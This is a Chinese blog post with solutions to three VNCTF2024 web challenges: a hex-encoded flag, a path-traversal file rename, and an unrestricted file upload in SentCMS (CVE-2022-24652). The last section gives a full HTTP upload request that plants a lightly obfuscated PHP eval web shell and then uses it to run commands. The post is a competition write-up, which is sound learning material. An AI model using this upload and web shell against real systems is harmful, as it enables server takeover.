<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="VNCTF2024Checkin上来就是一个打砖块游戏，一般这种web题目和游戏没什么关系的，找的是游戏逻辑。   于是找源代码中的游戏逻辑，看到了game.js  打开看到了最终的游戏函数  这个字符串使用了十六进制编码（Hexadecimal），每两个字符代表一个字节。转换为ASCII文本后，我们得到： V N C T F { W 3 1 c 0 m 3 _ t 0 _ V N C T F _">
<meta property="og:type" content="article">
<meta property="og:title" content="VNCTF复现___有时间就更新">
<meta property="og:url" content="http://example.com/2024/02/23/VNCTF%E5%A4%8D%E7%8E%B0___%E6%9C%89%E6%97%B6%E9%97%B4%E5%B0%B1%E6%9B%B4%E6%96%B0/index.html">
<meta property="og:site_name" content="❤ca1hua❤">
<meta property="og:description" content="VNCTF2024Checkin上来就是一个打砖块游戏，一般这种web题目和游戏没什么关系的，找的是游戏逻辑。   于是找源代码中的游戏逻辑，看到了game.js  打开看到了最终的游戏函数  这个字符串使用了十六进制编码（Hexadecimal），每两个字符代表一个字节。转换为ASCII文本后，我们得到： V N C T F { W 3 1 c 0 m 3 _ t 0 _ V N C T F _">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-23_22-08-04.png">
<meta property="og:image" content="https://pcsdata.baidu.com/thumbnail/77ba0167ap9d18805036a0f397756a03?fid=1100258353972-16051585-633593871540862&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-+ueTpJt1FqKS/hXZzSZknJa5UfM=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=97899798441439598&dp-callid=0&time=1708696800&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video">
<meta property="og:image" content="https://pcsdata.baidu.com/thumbnail/c17a151c6u2937e19cb20cc6398477e4?fid=1100258353972-16051585-197267071060874&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-Fo2Nj/KC23/S/I+cwbKFrJuUZbs=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=97899798441439598&dp-callid=0&time=1708696800&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-23_22-56-06.png">
<meta property="og:image" content="https://pcsdata.baidu.com/thumbnail/d12a0fee5vf5a2a2543fe5ba228ab3c5?fid=1100258353972-16051585-434397614039985&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-FdQxnrTkAoJKKDvSnMuPJ67CWfQ=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=98529785579680266&dp-callid=0&time=1708700400&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video">
<meta property="og:image" content="https://pcsdata.baidu.com/thumbnail/4bea62560vbeab11a57011e37267d180?fid=1100258353972-16051585-811692006256520&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-Jbb6qGM5wRPlcJ/ypNH5poRfJco=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=99200229362480148&dp-callid=0&time=1708700400&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video">
<meta property="og:image" content="https://pcsdata.baidu.com/thumbnail/783313af6s91199daaf861f3f0ac4935?fid=1100258353972-16051585-657614381204135&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-PaZpqk8/H5s5OQvSr7TSXELtojc=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=99200229362480148&dp-callid=0&time=1708700400&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video">
<meta property="og:image" content="https://pcsdata.baidu.com/thumbnail/f081d2b74t8b249a1549338a73073dcc?fid=1100258353972-16051585-855454632101584&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-F2ACnmnlOykOSqezU4d3GE5hJdY=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=98966201655795155&dp-callid=0&time=1708700400&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-24_22-53-42.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-24_23-00-47.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-24_22-29-06.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-24_22-29-34.png">
<meta property="og:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-24_22-29-34.png">
<meta property="article:published_time" content="2024-02-23T10:08:15.000Z">
<meta property="article:modified_time" content="2024-02-25T08:36:09.520Z">
<meta property="article:author" content="陈曦">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-23_22-08-04.png">

<link rel="canonical" href="http://example.com/2024/02/23/VNCTF%E5%A4%8D%E7%8E%B0___%E6%9C%89%E6%97%B6%E9%97%B4%E5%B0%B1%E6%9B%B4%E6%96%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>VNCTF复现___有时间就更新 | ❤ca1hua❤</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">❤ca1hua❤</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description"> </p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/02/23/VNCTF%E5%A4%8D%E7%8E%B0___%E6%9C%89%E6%97%B6%E9%97%B4%E5%B0%B1%E6%9B%B4%E6%96%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/20240222142431.jpg">
      <meta itemprop="name" content="陈曦">
      <meta itemprop="description" content="爱人先爱己，择人先问心，caihua祝你天天开心！">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="❤ca1hua❤">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          VNCTF复现___有时间就更新
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-23 18:08:15" itemprop="dateCreated datePublished" datetime="2024-02-23T18:08:15+08:00">2024-02-23</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-02-25 16:36:09" itemprop="dateModified" datetime="2024-02-25T16:36:09+08:00">2024-02-25</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="VNCTF2024"><a href="#VNCTF2024" class="headerlink" title="VNCTF2024"></a>VNCTF2024</h2><h3 id="Checkin"><a href="#Checkin" class="headerlink" title="Checkin"></a>Checkin</h3><p>上来就是一个打砖块游戏，一般这种web题目和游戏没什么关系的，找的是游戏逻辑。</p>
<img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-23_22-08-04.png" style="zoom:50%;" />

<p>于是找源代码中的游戏逻辑，看到了game.js</p>
<p><img src="https://pcsdata.baidu.com/thumbnail/77ba0167ap9d18805036a0f397756a03?fid=1100258353972-16051585-633593871540862&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-+ueTpJt1FqKS/hXZzSZknJa5UfM=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=97899798441439598&dp-callid=0&time=1708696800&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video"></p>
<p>打开看到了最终的游戏函数</p>
<p><img src="https://pcsdata.baidu.com/thumbnail/c17a151c6u2937e19cb20cc6398477e4?fid=1100258353972-16051585-197267071060874&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-Fo2Nj/KC23/S/I+cwbKFrJuUZbs=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=97899798441439598&dp-callid=0&time=1708696800&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video"></p>
<p>这个字符串使用了十六进制编码（Hexadecimal），每两个字符代表一个字节。转换为ASCII文本后，我们得到：</p>
<p>V N C T F { W 3 1 c 0 m 3 _ t 0 _ V N C T F _ 2 0 2 4 _ g @ o d _ J 0 B ! ! ! ! }</p>
<p>也就是  VNCTF{W31c0m3_t0_VNCTF_2024_g@od_J0B!!!!}</p>
<h3 id="CutePath"><a href="#CutePath" class="headerlink" title="CutePath"></a>CutePath</h3><p>经典真实背景，一般这种题目，都能搜到他的漏洞，GitHub上有记载。</p>
<img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-23_22-56-06.png" style="zoom:67%;" />

<p>直接上手</p>
<p><img src="https://pcsdata.baidu.com/thumbnail/d12a0fee5vf5a2a2543fe5ba228ab3c5?fid=1100258353972-16051585-434397614039985&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-FdQxnrTkAoJKKDvSnMuPJ67CWfQ=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=98529785579680266&dp-callid=0&time=1708700400&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video"></p>
<p>ok，直接目录穿透了。并且看到了一个base64的编码，解密之后是账号密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">admin:gdgm.edu.cn@M1n9K1n9P@as（账号是admin，密码是gdgm.edu.cn@M1n9K1n9P@as）</span><br><span class="line">谁家好人还想着爆破呢，斩了！！</span><br></pre></td></tr></table></figure>

<p>登录之后发现就可以改名字，先保留想法，既然出现目录穿透，登录后又给了改名，那么就有可能通过改名来是实现文件的迁移。</p>
<p>ok下面就是寻找flag的文件了，随便找，利用..&#x2F;都看看</p>
<p><img src="https://pcsdata.baidu.com/thumbnail/4bea62560vbeab11a57011e37267d180?fid=1100258353972-16051585-811692006256520&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-Jbb6qGM5wRPlcJ/ypNH5poRfJco=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=99200229362480148&dp-callid=0&time=1708700400&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video"></p>
<p>找到flag.txt文件，但是不能查看，我们可以考虑前面提到的重命名将flag.txt文件传送到share_main目录下，这样我们就可以查看了:</p>
<p>直接将flag.txt重命名为</p>
<p><strong>..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;home&#x2F;ming&#x2F;share_main&#x2F;flag.txt</strong></p>
<p><img src="https://pcsdata.baidu.com/thumbnail/783313af6s91199daaf861f3f0ac4935?fid=1100258353972-16051585-657614381204135&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-PaZpqk8/H5s5OQvSr7TSXELtojc=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=99200229362480148&dp-callid=0&time=1708700400&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video"></p>
<p>点开它</p>
<p><img src="https://pcsdata.baidu.com/thumbnail/f081d2b74t8b249a1549338a73073dcc?fid=1100258353972-16051585-855454632101584&rt=pr&sign=FDTAER-yUdy3dSFZ0SVxtzShv1zcMqd-F2ACnmnlOykOSqezU4d3GE5hJdY=&expires=48h&chkv=0&chkbd=0&chkpc=&dp-logid=98966201655795155&dp-callid=0&time=1708700400&bus_no=26&size=c1600_u1600&quality=100&vuk=-&ft=video"></p>
<h3 id="TrySent"><a href="#TrySent" class="headerlink" title="TrySent"></a>TrySent</h3><p>打开题目是这个“SentCMS网站管理系统”，直接看最隐私的成分——后台管理，打开后就是<a target="_blank" rel="noopener" href="http://www.thinkphp.cn/">ThinkPHP</a>         V6.0.5 ，要懂得出题人的良苦用心啊，可以搜搜thinkphp的漏洞，运气好直接就能打开了。如果没搜到的话，继续找信息，注册登录一下，发现了一个上传头像，在ctf里只要看到文件上传就是一个大方向，还没有提供上传的放法，一定有猫腻。</p>
<p>接着前面搜索的历史漏洞，其实这是CVE-2022-24652，危险类型文件的不加限制上传，直接访问 &#x2F;user&#x2F;upload&#x2F;upload 就ok</p>
<img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-24_22-53-42.png" style="zoom:67%;" />

<p>没有上传按钮能难倒ctfer吗？</p>
<p>直接抓包进行修改</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">POST /user/upload/upload HTTP/1.1</span><br><span class="line">Host: 31c9b5d9-73f1-4c2b-9943-ba531630c95f.vnctf2024.manqiu.top</span><br><span class="line">Cache-Control: max-age=0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line">Accept-Encoding: gzip, deflate, br</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Cookie: PHPSESSID=0735d712b4bc50280a83a714650b432d</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz</span><br><span class="line">Content-Length: 869</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">------WebKitFormBoundaryrhx2kYAMYDqoTThz</span><br><span class="line">Content-Disposition: form-data; name=&quot;id&quot;</span><br><span class="line"></span><br><span class="line">WU_FILE_0</span><br><span class="line">------WebKitFormBoundaryrhx2kYAMYDqoTThz</span><br><span class="line">Content-Disposition: form-data; name=&quot;name&quot;</span><br><span class="line"></span><br><span class="line">test.jpg</span><br><span class="line">------WebKitFormBoundaryrhx2kYAMYDqoTThz</span><br><span class="line">Content-Disposition: form-data; name=&quot;type&quot;</span><br><span class="line"></span><br><span class="line">image/jpeg</span><br><span class="line">------WebKitFormBoundaryrhx2kYAMYDqoTThz</span><br><span class="line">Content-Disposition: form-data; name=&quot;lastModifiedDate&quot;</span><br><span class="line"></span><br><span class="line">Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)</span><br><span class="line">------WebKitFormBoundaryrhx2kYAMYDqoTThz</span><br><span class="line">Content-Disposition: form-data; name=&quot;size&quot;</span><br><span class="line"></span><br><span class="line">164264</span><br><span class="line">------WebKitFormBoundaryrhx2kYAMYDqoTThz</span><br><span class="line">Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;shell.php&quot;</span><br><span class="line">Content-Type: image/jpeg</span><br><span class="line"></span><br><span class="line">caihua</span><br><span class="line">&lt;?plp ev@l($_P@Ste[1]);?&gt;//你们能看懂就好我的物理机一直报有后门危险</span><br><span class="line"></span><br><span class="line">------WebKitFormBoundaryrhx2kYAMYDqoTThz--</span><br></pre></td></tr></table></figure>

<p>如果你是新手我用的是火狐浏览器，你直接复制粘贴到bp里然后再改改地址什么的就欧克了</p>
<p>看到响应里已经上传上了，还有地址。</p>
<img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-24_23-00-47.png" style="zoom:80%;" />

<p>刚才写的内容是这个，经典一句话木马。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">caihua</span><br><span class="line">&lt;?plp ev@l($_P@Ste[1]);?&gt;//你们能看懂就好我的物理机一直报有后门危险</span><br></pre></td></tr></table></figure>

<p>POST传的参数，跑一下两个命令ls和cat，如下图。</p>
<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-24_22-29-06.png" style="zoom:67%;" /><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-24_22-29-34.png"></p>
<p><img src="https://ca1hua.oss-cn-beijing.aliyuncs.com/test/Snipaste_2024-02-24_22-29-34.png"></p>
<p>拿下flag。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/02/22/%E5%8C%BA%E5%9D%97%E9%93%BE/" rel="prev" title="区块链进度">
      <i class="fa fa-chevron-left"></i> 区块链进度
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/02/25/%E5%81%87%E6%9C%9F%E7%A0%94%E7%A9%B6%E6%8A%A5%E5%91%8A/" rel="next" title="假期研究报告">
      假期研究报告 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#VNCTF2024"><span class="nav-number">1.</span> <span class="nav-text">VNCTF2024</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Checkin"><span class="nav-number">1.1.</span> <span class="nav-text">Checkin</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CutePath"><span class="nav-number">1.2.</span> <span class="nav-text">CutePath</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#TrySent"><span class="nav-number">1.3.</span> <span class="nav-text">TrySent</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="陈曦"
      src="/images/20240222142431.jpg">
  <p class="site-author-name" itemprop="name">陈曦</p>
  <div class="site-description" itemprop="description">爱人先爱己，择人先问心，caihua祝你天天开心！</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ca1hua" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ca1hua" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2024-2 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">陈曦</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
